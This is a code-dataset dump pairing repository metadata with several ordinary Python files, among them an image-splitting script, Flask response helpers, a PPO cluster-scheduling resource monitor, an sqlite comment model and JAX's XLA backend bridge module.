hexsha
stringlengths
40
40
size
int64
3
1.03M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
972
max_stars_repo_name
stringlengths
6
130
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
972
max_issues_repo_name
stringlengths
6
130
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
972
max_forks_repo_name
stringlengths
6
130
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
3
1.03M
avg_line_length
float64
1.13
941k
max_line_length
int64
2
941k
alphanum_fraction
float64
0
1
56dede1f84776abd68712b1bc66617088bc13c37
2,097
py
Python
images/parse.py
pippinhio/image-recognition
89569a0d66ae144d2f6e6f2d73a8577ef8b2272b
[ "MIT" ]
1
2022-03-28T08:12:21.000Z
2022-03-28T08:12:21.000Z
images/parse.py
pippinhio/image-recognition
89569a0d66ae144d2f6e6f2d73a8577ef8b2272b
[ "MIT" ]
null
null
null
images/parse.py
pippinhio/image-recognition
89569a0d66ae144d2f6e6f2d73a8577ef8b2272b
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Run with e.g. ./parse.py franz import sys import os import matplotlib.pyplot as plt import numpy as np import torch import torchvision import torchvision.transforms as transforms def prepare_folder(category): os.system("rm -rf %s" % category) os.system("mkdir %s" % category) def create_images_handwriting(category): big_image = plt.imread('%s.jpg' % category) nx = 36 #rows ny = 41 #columns count = 0 for i in range(nx): for j in range(ny): small_image = big_image[32*i:32*(i+1), 32*j:32*(j+1), :] file_path = '%s/%06d' % (category, count) plt.imsave(file_path + '.png', small_image) os.system('convert %s.png %s.jpg' % (file_path, file_path)) os.system('rm %s.png' % file_path) count += 1 def transform_tensor_to_numpy(image): image = image / 2 + 0.5 np_image = image.numpy() return np.transpose(np_image, (1, 2, 0)) def create_images_torchvision(category, idx): transform = transforms.Compose( [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]) images_set = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform) images_loader = torch.utils.data.DataLoader(images_set, batch_size=1, shuffle=False, num_workers=2) count = 0 for data in images_loader: image, label = data if label != idx: continue file_path = '%s/%06d' % (category, count) plt.imsave(file_path + '.png', transform_tensor_to_numpy(image[0])) os.system('convert %s.png %s.jpg' % (file_path, file_path)) os.system('rm %s.png' % file_path) count += 1 if count == 1476: break if __name__ == '__main__': category = sys.argv[1] if category in ('franz', 'nina', 'robert_scan', 'franz_scan'): prepare_folder(category) create_images_handwriting(category) classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') if category in classes: prepare_folder(category) create_images_torchvision(category, classes.index(category)) pass
28.726027
106
0.65856
601f5518aadb6f8a53de564498a2114336bd08c5
357
py
Python
books/common/response.py
jhgdike/books
dde36f4d419d1b3afb2c87c3509d7672d9c07c75
[ "MIT" ]
null
null
null
books/common/response.py
jhgdike/books
dde36f4d419d1b3afb2c87c3509d7672d9c07c75
[ "MIT" ]
3
2022-03-09T03:53:43.000Z
2022-03-09T03:53:48.000Z
books/common/response.py
jhgdike/books
dde36f4d419d1b3afb2c87c3509d7672d9c07c75
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals from flask import jsonify def json_success(data=''): resp_json = { 'code': 0, 'data': data, } return jsonify(**resp_json) def json_err(err, msg=''): resp_json = { 'code': err, 'msg': msg or err.label, } return jsonify(**resp_json)
16.227273
39
0.565826
700510ac2d47dd8e8e96aa087011e4bba4a2d8d0
1,489
py
Python
forceDAQ/_lib/polling_time_profile.py
raunaqbhirangi/pyForceDAQ
a2a41cd7a4a4f0afd178bc5555ba4e0540902d30
[ "MIT" ]
8
2016-06-27T12:07:14.000Z
2022-03-29T08:59:44.000Z
forceDAQ/_lib/polling_time_profile.py
raunaqbhirangi/pyForceDAQ
a2a41cd7a4a4f0afd178bc5555ba4e0540902d30
[ "MIT" ]
1
2020-01-15T20:29:53.000Z
2020-07-31T17:35:34.000Z
forceDAQ/_lib/polling_time_profile.py
raunaqbhirangi/pyForceDAQ
a2a41cd7a4a4f0afd178bc5555ba4e0540902d30
[ "MIT" ]
3
2020-01-14T18:31:39.000Z
2022-03-25T05:56:40.000Z
from .timer import get_time import numpy as np class PollingTimeProfile(object): def __init__(self, timing_range=10): self._last = None self._timing_range = 10 self._zero_cnt = 0 #self._zero_time_polling_frequency = {} self.profile_frequency = np.array([0] * (timing_range + 1)) def stop(self): self._last = None def update(self, time_ms): if self._last is not None: d = time_ms - self._last if d > self._timing_range: d = self._timing_range self.profile_frequency[d] += 1 #if d == 0: # self._zero_cnt += 1 #elif self._zero_cnt > 0: # try: # self._zero_time_polling_frequency[self._zero_cnt] += 1 # except: # self._zero_time_polling_frequency[self._zero_cnt] = 1 # self._zero_cnt = 0 self._last = time_ms def tick(self): self.update(int(1000*get_time())) @property def profile_percent(self): n = np.sum(self.profile_frequency) return self.profile_frequency / n def get_profile_str(self): rtn = str(list(self.profile_frequency) ).replace("[", "").replace("]", "").replace(" ", "") return "polling profile [{}]".format(rtn) #@property #def zero_time_polling_frequency(self): # return np.array(list(self._zero_time_polling_frequency.items()))
29.78
75
0.567495
6d25e9ed91a52deabecb134a44b6f9eb4aad016a
10,641
py
Python
resources_monitor.py
Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning
eb246ebba160567277c9c1aa226e359f48629dac
[ "MIT" ]
2
2022-03-03T08:52:14.000Z
2022-03-11T02:27:57.000Z
resources_monitor.py
Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning
eb246ebba160567277c9c1aa226e359f48629dac
[ "MIT" ]
1
2022-03-11T02:51:06.000Z
2022-03-11T05:02:34.000Z
resources_monitor.py
Livioni/Cloud-Workflow-Scheduling-base-on-Deep-Reinforcement-Learning
eb246ebba160567277c9c1aa226e359f48629dac
[ "MIT" ]
null
null
null
import os from datetime import datetime import gym import numpy as np import torch import torch.nn as nn import xlwt from torch.distributions import Categorical, MultivariateNormal def initial_excel(): global worksheet, workbook # xlwt 库将数据导入Excel并设置默认字符编码为ascii workbook = xlwt.Workbook(encoding='ascii') # 添加一个表 参数为表名 worksheet = workbook.add_sheet('resources usage') # 生成单元格样式的方法 # 设置列宽, 3为列的数目, 12为列的宽度, 256为固定值 for i in range(3): worksheet.col(i).width = 256 * 12 # 设置单元格行高, 25为行高, 20为固定值 worksheet.row(1).height_mismatch = True worksheet.row(1).height = 20 * 25 worksheet.write(0, 0, 'time') worksheet.write(0, 1, 'CPU usage(%)') worksheet.write(0, 2, 'Memory usage(%)') worksheet.write(0, 3, 'time1') worksheet.write(0, 4, 'CPU(%)') worksheet.write(0, 5, 'Memory(%)') # 保存excel文件 workbook.save('data/res_monitor.xls') print("============================================================================================") ####### initialize environment hyperparameters ###### env_name = "clusterEnv-v0" # 定义自己的环境名称 max_ep_len = 10000 # max timesteps in one episode total_test_episodes = 1 # total num of testing episodes ################ PPO hyperparameters ################ K_epochs = 80 # update policy for K epochs in one PPO update eps_clip = 0.2 # clip parameter for PPO gamma = 0.99 # discount factor lr_actor = 0.0003 # learning rate for actor network lr_critic = 0.001 # learning rate for critic network ##################################################### print("Testing environment name : " + env_name) env = gym.make(env_name).unwrapped # state space dimension # action space dimension state_dim, action_dim = env.return_dim_info() ################### checkpointing ################### run_num_pretrained = 'resourceTest' #### change this to prevent overwriting weights in same env_name folder directory = "runs/PPO_preTrained" if not os.path.exists(directory): os.makedirs(directory) directory = directory + '/' + 'clusterEnv-v0' + '/' if not os.path.exists(directory): os.makedirs(directory) checkpoint_path = directory + "PPO_clusterEnv-v0_{}.pth".format(run_num_pretrained) print("save checkpoint path : " + checkpoint_path) ##################################################### ############# print all hyperparameters ############# print("--------------------------------------------------------------------------------------------") print("资源用量监视") print("--------------------------------------------------------------------------------------------") print("状态空间维数 : ", state_dim) print("动作空间维数 : ", action_dim) ################################## set device ################################## print("============================================================================================") # set device to cpu or cuda device = torch.device('cpu') if (torch.cuda.is_available()): device = torch.device('cuda:0') torch.cuda.empty_cache() print("Device set to : " + str(torch.cuda.get_device_name(device))) else: print("Device set to : cpu") print("============================================================================================") line = 1 flag = 0 ################################## PPO Policy ################################## class RolloutBuffer: def __init__(self): self.actions = [] self.states = [] self.logprobs = [] self.rewards = [] self.is_terminals = [] def clear(self): del self.actions[:] del self.states[:] del self.logprobs[:] del self.rewards[:] del self.is_terminals[:] class ActorCritic(nn.Module): def __init__(self, state_dim, action_dim): super(ActorCritic, self).__init__() self.actor = nn.Sequential( nn.Linear(state_dim, 64), nn.Tanh(), nn.Linear(64, 64), nn.Tanh(), nn.Linear(64, action_dim), nn.Softmax(dim=-1) ) # critic self.critic = nn.Sequential( nn.Linear(state_dim, 64), nn.Tanh(), nn.Linear(64, 64), nn.Tanh(), nn.Linear(64, 1) ) def forward(self): raise NotImplementedError def act(self, state): # global flag,line probability = {} action_probs = self.actor(state) dist = Categorical(action_probs) for j in range(action_dim): probability[j] = dist.probs.detach()[j] # 记录当前动作概率分布 action = dist.sample() state, reward, done, info = env.step(action.item() - 1) while (info[0] == False): # 重采样 probability[action.item()] = 0 probability_list = [probs for probs in probability.values()] probs = torch.FloatTensor(probability_list) dist_copy = Categorical(probs) for j in range(len(dist_copy.probs)): probability_list[j] = dist_copy.probs[j].item() probs = torch.FloatTensor(probability_list) dist_1 = Categorical(probs) action = dist_1.sample().to(device) # 采样当前动作 # if action.item() == 0: # time, cpu_usage, memory_usage = env.return_res_usage() # worksheet.write(line, 1, str(100-cpu_usage)+'%') # worksheet.write(line, 2, str(100-memory_usage)+'%') # flag = 1 # line += 1 state, reward, done, info = env.step(action.item() - 1) # 输入step的都是 action_logprob = dist.log_prob(action).unsqueeze(0) return action.detach(), action_logprob.detach(), state, reward, done, info def evaluate(self, state, action): action_probs = self.actor(state) dist = Categorical(action_probs) action_logprobs = dist.log_prob(action) dist_entropy = dist.entropy() state_values = self.critic(state) return action_logprobs, state_values, dist_entropy class PPO: def __init__(self, state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip): self.gamma = gamma self.eps_clip = eps_clip self.K_epochs = K_epochs self.buffer = RolloutBuffer() # 经验池 self.policy = ActorCritic(state_dim, action_dim).to(device) # AC策略 self.optimizer = torch.optim.Adam([ {'params': self.policy.actor.parameters(), 'lr': lr_actor}, {'params': self.policy.critic.parameters(), 'lr': lr_critic} ]) self.policy_old = ActorCritic(state_dim, action_dim).to(device) # AC策略old网络 self.policy_old.load_state_dict(self.policy.state_dict()) self.MseLoss = nn.MSELoss() def select_action(self, state): with torch.no_grad(): state = torch.FloatTensor(state).to(device) self.buffer.states.append(state) action, action_logprob, state, reward, done, info = self.policy_old.act(state) self.buffer.actions.append(action) # 保存动作 self.buffer.logprobs.append(action_logprob) # 保存动作概率 return state, reward, done, info def update(self): # Monte Carlo estimate of returns rewards = [] discounted_reward = 0 for reward, is_terminal in zip(reversed(self.buffer.rewards), reversed(self.buffer.is_terminals)): if is_terminal: discounted_reward = 0 discounted_reward = reward + (self.gamma * discounted_reward) rewards.insert(0, discounted_reward) # Normalizing the rewards rewards = torch.tensor(rewards, dtype=torch.float32).to(device) rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-7) # convert list to tensor old_states = torch.squeeze(torch.stack(self.buffer.states, dim=0)).detach().to(device) old_actions = torch.squeeze(torch.stack(self.buffer.actions, dim=0)).detach().to(device) old_logprobs = torch.squeeze(torch.stack(self.buffer.logprobs, dim=0)).detach().to(device) # Optimize policy for K epochs for _ in range(self.K_epochs): # Evaluating old actions and values logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions) # match state_values tensor dimensions with rewards tensor state_values = torch.squeeze(state_values) # Finding the ratio (pi_theta / pi_theta__old) ratios = torch.exp(logprobs - old_logprobs.detach()) # Finding Surrogate Loss advantages = rewards - state_values.detach() surr1 = ratios * advantages surr2 = torch.clamp(ratios, 1 - self.eps_clip, 1 + self.eps_clip) * advantages # final loss of clipped objective PPO loss = -torch.min(surr1, surr2) + 0.5 * self.MseLoss(state_values, rewards) - 0.01 * dist_entropy # take gradient step self.optimizer.zero_grad() loss.mean().backward() self.optimizer.step() # Copy new weights into old policy self.policy_old.load_state_dict(self.policy.state_dict()) # clear buffer self.buffer.clear() def save(self, checkpoint_path): torch.save(self.policy_old.state_dict(), checkpoint_path) def load(self, checkpoint_path): self.policy_old.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage)) self.policy.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage)) def test(): ################# testing procedure ################ # initialize a PPO agent global flag ppo_agent = PPO(state_dim, action_dim, lr_actor, lr_critic, gamma, K_epochs, eps_clip) # track total testing time ppo_agent.load(checkpoint_path) print("Network ID:", run_num_pretrained) print('PPO agent has been loaded!') # GCN test state = env.reset() for t in range(1, max_ep_len + 1): # select action with policy new_state, reward, done, info = ppo_agent.select_action(state) # saving reward and is_terminals # break; if the episode is over if flag == 1: time, cpu_usage, memory_usage = env.return_res_usage() worksheet.write(line - 1, 0, time) flag = 0 # 记录资源使用率 state = new_state if done: print("makesspan:", state[0]) break ppo_agent.buffer.clear() # workbook.save('data/res_monitor.xls') env.close() if __name__ == '__main__': # initial_excel() test()
34.436893
111
0.578235
8848857d911b4ab28453bc818aa1aab3174f531c
2,317
py
Python
backend/Models/Comment.py
HallWoodZhang/NEUTV_UWP
6509c79b17c881ecc1247a18f93b256f70b5d077
[ "MIT" ]
1
2019-03-18T15:37:44.000Z
2019-03-18T15:37:44.000Z
backend/Models/Comment.py
HallWoodZhang/NEUTV_UWP
6509c79b17c881ecc1247a18f93b256f70b5d077
[ "MIT" ]
3
2018-04-16T01:33:30.000Z
2018-05-04T01:52:00.000Z
backend/Models/Comment.py
HallWoodZhang/NEUTV_UWP
6509c79b17c881ecc1247a18f93b256f70b5d077
[ "MIT" ]
3
2018-04-10T09:39:40.000Z
2018-05-05T02:30:21.000Z
# encoding: utf-8 from __future__ import unicode_literals import sqlite3 import web from .Model import Model class Comment(Model): def __init__(self, channel_id = u'default', content = u'default', date = u'1111-11-11 00:00:00'): self.channel_id = channel_id self.content = content self.date = date def insert(self, conn): try: conn.execute( "insert into comment(channel_id, content, date) values(?, ?, ?)", (self.channel_id, self.content, self.date) ) conn.commit() return True except Exception as e: print(e) print('insert comment failed %s, %s, %s', self.channel_id, self.content, self.date) return False # static function def query_by_period(conn, beg, end, channel_id): ''' insert the object itself to the database by connection ''' cache = [] curr = conn.cursor() sql = 'select channel_id, content, date from comment' +\ ' where datetime(date)>=datetime(?) and datetime(?)>=datetime(date) and channel_id=?' try: for tmp in curr.execute(sql, (beg, end, channel_id)).fetchall(): cache.append(create_comment_from_tuple(tmp)) except Exception as e: print(e) raise AttributeError finally: curr.close() return cache # static function def query_by_period_tuples(conn, beg, end, channel_id): ''' the static method return a list of tuples instead of objects tuples: (channel_id, content, date) ''' sql = 'select channel_id, content, date from comment' +\ ' where datetime(date)>=datetime(?) and datetime(?)>=datetime(date) and channel_id=?' try: return conn.execute(sql, (beg, end, channel_id)).fetchall() except Exception as e: print(e) raise AttributeError return None def __str__(self): return self.content def create_comment_from_args( channel_id = u'default', content = u'default', date = u'1111-11-11 00:00:00' ): return Comment(channel_id, content, date) def create_comment_from_tuple(tp): return Comment(tp[0], tp[1], tp[2])
31.310811
101
0.587829
1a4f232eaa685ad4b14da1056abfb7951f97d169
19,098
py
Python
jax/_src/lib/xla_bridge.py
mkovaxx/jax
7ce55684356253859928728c82916ac373e283f9
[ "Apache-2.0" ]
1
2020-01-13T18:55:49.000Z
2020-01-13T18:55:49.000Z
jax/_src/lib/xla_bridge.py
mkovaxx/jax
7ce55684356253859928728c82916ac373e283f9
[ "Apache-2.0" ]
6
2021-11-25T07:58:40.000Z
2022-01-31T21:15:49.000Z
jax/_src/lib/xla_bridge.py
abattery/jax
62c7744e68c66fae9faf9d8d00fea8aad4418cf3
[ "Apache-2.0" ]
null
null
null
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Interface and utility functions to XLA. This module wraps the XLA client(s) and builders to standardize their interfaces and provide some automatic type mapping logic for converting between Numpy and XLA. There are also a handful of related casting utilities. """ from functools import partial, lru_cache import os import threading from typing import Any, Dict, List, Optional, Tuple, Union import warnings from absl import logging # Disable "WARNING: Logging before flag parsing goes to stderr." message logging._warn_preinit_stderr = 0 import jax._src.lib from jax._src.config import flags, bool_env from . import tpu_driver_client from . import xla_client from jax._src import util, traceback_util import numpy as np iree: Optional[Any] try: import jax._src.iree as iree # type: ignore except ModuleNotFoundError: iree = None traceback_util.register_exclusion(__file__) xops = xla_client.ops FLAGS = flags.FLAGS # TODO(phawkins): Remove jax_xla_backend. flags.DEFINE_string( 'jax_xla_backend', '', 'Deprecated, please use --jax_platforms instead.') flags.DEFINE_string( 'jax_backend_target', '', 'Either "local" or "rpc:address" to connect to a remote service target.') # TODO(skye): warn when this is used once we test out --jax_platforms a bit flags.DEFINE_string( 'jax_platform_name', os.getenv('JAX_PLATFORM_NAME', '').lower(), 'Deprecated, please use --jax_platforms instead.') flags.DEFINE_string( 'jax_platforms', os.getenv('JAX_PLATFORMS', '').lower(), 'Comma-separated list of platform names specifying which platforms jax ' 'should attempt to initialize. The first platform in the list that is ' 'successfully initialized will be used as the default platform. For ' 'example, --jax_platforms=cpu,gpu means that CPU and GPU backends will be ' 'initialized, and the CPU backend will be used unless otherwise specified; ' '--jax_platforms=cpu means that only the CPU backend will be initialized. ' 'By default, jax will try to initialize all available platforms and will ' 'default to GPU or TPU if available, and fallback to CPU otherwise.') flags.DEFINE_bool( 'jax_disable_most_optimizations', bool_env('JAX_DISABLE_MOST_OPTIMIZATIONS', False), 'Try not to do much optimization work. This can be useful if the cost of ' 'optimization is greater than that of running a less-optimized program.') def get_compile_options( num_replicas: int, num_partitions: int, device_assignment=None, use_spmd_partitioning: bool = True, ) -> xla_client.CompileOptions: """Returns the compile options to use, as derived from flag values. Args: num_replicas: Number of replicas for which to compile. num_partitions: Number of partitions for which to compile. device_assignment: Optional tuple of integers indicating the assignment of logical replicas to physical devices (default inherited from xla_client.CompileOptions). Must be consistent with `num_replicas` and `num_partitions`. use_spmd_partitioning: boolean indicating whether to enable SPMD or MPMD partitioning in XLA. """ compile_options = xla_client.CompileOptions() compile_options.num_replicas = num_replicas compile_options.num_partitions = num_partitions build_options = compile_options.executable_build_options build_options.use_spmd_partitioning = use_spmd_partitioning if device_assignment is not None: logging.vlog( 2, 'get_compile_options: num_replicas=%s num_partitions=%s device_assignment=%s', num_replicas, num_partitions, device_assignment) device_assignment = np.array(device_assignment) # Allow 1D device assignment if num_partitions is 1. if (device_assignment.ndim == 1) and (num_partitions == 1): device_assignment = device_assignment[:, None] if num_replicas != device_assignment.shape[0]: msg = 'device_assignment does not match num_replicas: {} vs {}.' raise ValueError(msg.format(device_assignment, num_replicas)) if num_partitions != device_assignment.shape[1]: msg = 'device_assignment does not match num_partitions: {} vs {}.' raise ValueError(msg.format(device_assignment, num_partitions)) device_assignment = xla_client.DeviceAssignment.create(device_assignment) assert device_assignment.replica_count() == num_replicas assert device_assignment.computation_count() == num_partitions compile_options.device_assignment = device_assignment debug_options = compile_options.executable_build_options.debug_options if jax._src.lib.cuda_path is not None: debug_options.xla_gpu_cuda_data_dir = jax._src.lib.cuda_path if FLAGS.jax_disable_most_optimizations: debug_options.xla_backend_optimization_level = 0 debug_options.xla_llvm_disable_expensive_passes = True debug_options.xla_test_all_input_layouts = False return compile_options # Backends def _make_tpu_driver_client(): if tpu_driver_client is None: logging.info("Remote TPU is not linked into jax; skipping remote TPU.") return None if FLAGS.jax_backend_target is None: logging.info("No --jax_backend_target was provided; skipping remote TPU.") return None return tpu_driver_client.TpuBackend.create(worker=FLAGS.jax_backend_target) def tpu_client_timer_callback(timer_secs: float): def _log_warning(): warnings.warn( f'TPU backend initialization is taking more than {timer_secs} seconds. ' 'Did you run your code on all TPU hosts? ' 'See https://jax.readthedocs.io/en/latest/multi_process.html ' 'for more information.') # Will log a warning after `timer_secs`. t = threading.Timer(timer_secs, _log_warning) t.start() try: client = xla_client.make_tpu_client() finally: t.cancel() return client # Backends, in increasing order of preference. # We have no particular opinion about how "backends" relate to "devices". For # example, there could be multiple backends that provide the same kind of # device. _backend_factories = {} _default_backend = None _backends : Dict[str, Any] = {} _backends_errors : Dict[str, str] = {} _backend_lock = threading.Lock() def register_backend_factory(name, factory, *, priority=0): with _backend_lock: if name in _backends: raise RuntimeError(f"Backend {name} already initialized") _backend_factories[name] = (factory, priority) register_backend_factory('interpreter', xla_client.make_interpreter_client, priority=-100) register_backend_factory('cpu', partial(xla_client.make_cpu_client, use_tfrt=True), priority=0) register_backend_factory('tpu_driver', _make_tpu_driver_client, priority=100) register_backend_factory('gpu', xla_client.make_gpu_client, priority=200) register_backend_factory( 'tpu', partial(tpu_client_timer_callback, timer_secs=60.0), priority=300) if iree is not None: register_backend_factory("iree", iree.iree_client_factory, priority=-100) def backends(): global _backends global _backends_errors global _default_backend with _backend_lock: if _backends: return _backends if FLAGS.jax_platforms: platforms = FLAGS.jax_platforms.split(",") priorities = range(len(platforms), 0, -1) platforms_and_priorites = zip(platforms, priorities) else: platforms_and_priorites = ( (platform, priority) for platform, (_, priority) in _backend_factories.items()) default_priority = -1000 for platform, priority in platforms_and_priorites: try: backend = _init_backend(platform) _backends[platform] = backend if priority > default_priority: _default_backend = backend default_priority = priority except Exception as err: if platform in ('cpu', 'interpreter'): # We always expect the CPU and interpreter backends to initialize # successfully. raise else: # If the backend isn't built into the binary, or if it has no devices, # we expect a RuntimeError. logging.info("Unable to initialize backend '%s': %s", platform, err) _backends_errors[platform] = str(err) continue if _default_backend.platform == "cpu" and FLAGS.jax_platform_name != 'cpu': logging.warning('No GPU/TPU found, falling back to CPU. ' '(Set TF_CPP_MIN_LOG_LEVEL=0 and rerun for more info.)') return _backends def _init_backend(platform): factory, unused_priority = _backend_factories.get(platform, (None, None)) if factory is None: raise RuntimeError(f"Unknown backend '{platform}'") logging.vlog(1, "Initializing backend '%s'" % platform) backend = factory() # TODO(skye): consider raising more descriptive errors directly from backend # factories instead of returning None. if backend is None: raise RuntimeError(f"Could not initialize backend '{platform}'") if backend.device_count() == 0: raise RuntimeError(f"Backend '{platform}' provides no devices.") util.distributed_debug_log(("Initialized backend", backend.platform), ("process_index", backend.process_index()), ("device_count", backend.device_count()), ("local_devices", backend.local_devices())) logging.vlog(1, "Backend '%s' initialized" % platform) return backend def _get_backend_uncached(platform=None): # TODO(mattjj,skyewm): remove this input polymorphism after we clean up how # 'backend' values are handled if not isinstance(platform, (type(None), str)): return platform bs = backends() platform = (platform or FLAGS.jax_xla_backend or FLAGS.jax_platform_name or None) if platform is not None: backend = bs.get(platform, None) if backend is None: if platform in _backends_errors: raise RuntimeError(f"Backend '{platform}' failed to initialize: " f"{_backends_errors[platform]}") raise RuntimeError(f"Unknown backend {platform}") return backend else: return _default_backend @lru_cache(maxsize=None) # don't use util.memoize because there is no X64 dependence. def get_backend(platform=None): return _get_backend_uncached(platform) def get_device_backend(device=None): """Returns the Backend associated with `device`, or the default Backend.""" if device is not None: return device.client return get_backend() def device_count(backend: Optional[str] = None) -> int: """Returns the total number of devices. On most platforms, this is the same as :py:func:`jax.local_device_count`. However, on multi-process platforms where different devices are associated with different processes, this will return the total number of devices across all processes. Args: backend: This is an experimental feature and the API is likely to change. Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or ``'tpu'``. Returns: Number of devices. """ return int(get_backend(backend).device_count()) def local_device_count(backend: Optional[str] = None) -> int: """Returns the number of devices addressable by this process.""" return int(get_backend(backend).local_device_count()) def devices(backend: Optional[str] = None) -> List[xla_client.Device]: """Returns a list of all devices for a given backend. .. currentmodule:: jaxlib.xla_extension Each device is represented by a subclass of :class:`Device` (e.g. :class:`CpuDevice`, :class:`GpuDevice`). The length of the returned list is equal to ``device_count(backend)``. Local devices can be identified by comparing :attr:`Device.process_index` to the value returned by :py:func:`jax.process_index`. If ``backend`` is ``None``, returns all the devices from the default backend. The default backend is generally ``'gpu'`` or ``'tpu'`` if available, otherwise ``'cpu'``. Args: backend: This is an experimental feature and the API is likely to change. Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or ``'tpu'``. Returns: List of Device subclasses. """ return get_backend(backend).devices() def default_backend() -> str: """Returns the platform name of the default XLA backend.""" return get_backend(None).platform def local_devices(process_index: Optional[int] = None, backend: Optional[str] = None, host_id: Optional[int] = None) -> List[xla_client.Device]: """Like :py:func:`jax.devices`, but only returns devices local to a given process. If ``process_index`` is ``None``, returns devices local to this process. Args: process_index: the integer index of the process. Process indices can be retrieved via ``len(jax.process_count())``. backend: This is an experimental feature and the API is likely to change. Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or ``'tpu'``. Returns: List of Device subclasses. """ if host_id is not None: warnings.warn( "The argument to jax.local_devices has been renamed from `host_id` to " "`process_index`. This alias will eventually be removed; please update " "your code.") process_index = host_id if process_index is None: process_index = get_backend(backend).process_index() if not (0 <= process_index < process_count()): raise ValueError(f"Unknown process_index {process_index}") return [d for d in devices(backend) if d.process_index == process_index] def process_index(backend: Optional[str] = None) -> int: """Returns the integer process index of this process. On most platforms, this will always be 0. This will vary on multi-process platforms though. Args: backend: This is an experimental feature and the API is likely to change. Optional, a string representing the xla backend: ``'cpu'``, ``'gpu'``, or ``'tpu'``. Returns: Integer process index. """ return get_backend(backend).process_index() # TODO: remove this sometime after jax 0.2.13 is released def host_id(backend=None): warnings.warn( "jax.host_id has been renamed to jax.process_index. This alias " "will eventually be removed; please update your code.") return process_index(backend) def process_count(backend: Optional[str] = None) -> int: """Returns the number of JAX processes associated with the backend.""" return max(d.process_index for d in devices(backend)) + 1 # TODO: remove this sometime after jax 0.2.13 is released def host_count(backend=None): warnings.warn( "jax.host_count has been renamed to jax.process_count. This alias " "will eventually be removed; please update your code.") return process_count(backend) # TODO: remove this sometime after jax 0.2.13 is released def host_ids(backend=None): warnings.warn( "jax.host_ids has been deprecated; please use range(jax.process_count()) " "instead. jax.host_ids will eventually be removed; please update your " "code.") return list(range(process_count(backend))) ### utility functions def parameter(builder, num, shape, name=None, replicated=None): if name is None: name = '' if replicated is None: replicated = [] elif isinstance(replicated, bool): replicated = [replicated] * shape.leaf_count() return xops.Parameter(builder, num, shape.with_major_to_minor_layout_if_absent(), name, replicated) # HLO instructions optionally can be annotated to say how the output should be # spatially partitioned (represented in XLA as OpSharding protos, see # _sharding_to_proto). For array outputs, the annotation is either an int per # dimension specifying the number of ways that dimension divided (i.e. the total # number of shards is the product), or None to indicate the array should be # replicated. Tuple outputs are represented as tuples thereof. XLA supports # arbitrary tuple nesting, but JAX only uses one level of tupling (and our type # checkers don't support recursive types), so we only represent one level of # nesting in this type definition. SpatialSharding = Union[Tuple[int, ...], None, Tuple[Union[Tuple[int, ...], None], ...]] def _sharding_to_proto(sharding: SpatialSharding): """Converts a SpatialSharding to an OpSharding. See https://github.com/tensorflow/tensorflow/blob/main/tensorflow/compiler/xla/xla_data.proto#L601 for details on the OpSharding proto. """ proto = xla_client.OpSharding() if isinstance(sharding, tuple) and not isinstance(sharding[0], int): assert all(s is None or isinstance(s, tuple) for s in sharding) return tuple_sharding_proto(list(map(_sharding_to_proto, sharding))) # type: ignore if sharding is None: proto.type = xla_client.OpSharding.Type.REPLICATED else: proto.type = xla_client.OpSharding.Type.OTHER proto.tile_assignment_dimensions = list(sharding) proto.tile_assignment_devices = list(range(np.product(sharding))) return proto def tuple_sharding_proto(elems): proto = xla_client.OpSharding() assert all(isinstance(e, type(proto)) for e in elems) proto.type = xla_client.OpSharding.Type.TUPLE proto.tuple_shardings = elems return proto def set_sharding_proto(builder, op, sharding_proto): """Uses CustomCall to annotate a value as sharded.""" # "Sharding" is a built-in custom call target that acts like an identity # function, and is used to attach an OpSharding to. return with_sharding_proto(builder, sharding_proto, xops.CustomCall, builder, b"Sharding", [op], builder.get_shape(op)) def with_sharding_proto(builder, sharding_proto, op_fn, *args, **kwargs): """Builds op_fn(*args, **kwargs) with sharding annotation.""" builder.set_sharding(sharding_proto) try: return op_fn(*args, **kwargs) finally: builder.clear_sharding() def set_sharding(builder, op, sharding: SpatialSharding): """Uses CustomCall to annotate a value as sharded.""" return set_sharding_proto(builder, op, _sharding_to_proto(sharding)) def with_sharding(builder, sharding: SpatialSharding, op_fn, *args, **kwargs): """Builds op_fn(*args, **kwargs) with sharding annotation.""" return with_sharding_proto(builder, _sharding_to_proto(sharding), op_fn, *args, **kwargs)
37.083495
96
0.716986
f9be8c78e39fdf74c899bd9190d5de7898efe2ff
379
py
Python
TestDemo/test1.py
XiMuYouZi/PythonDemo
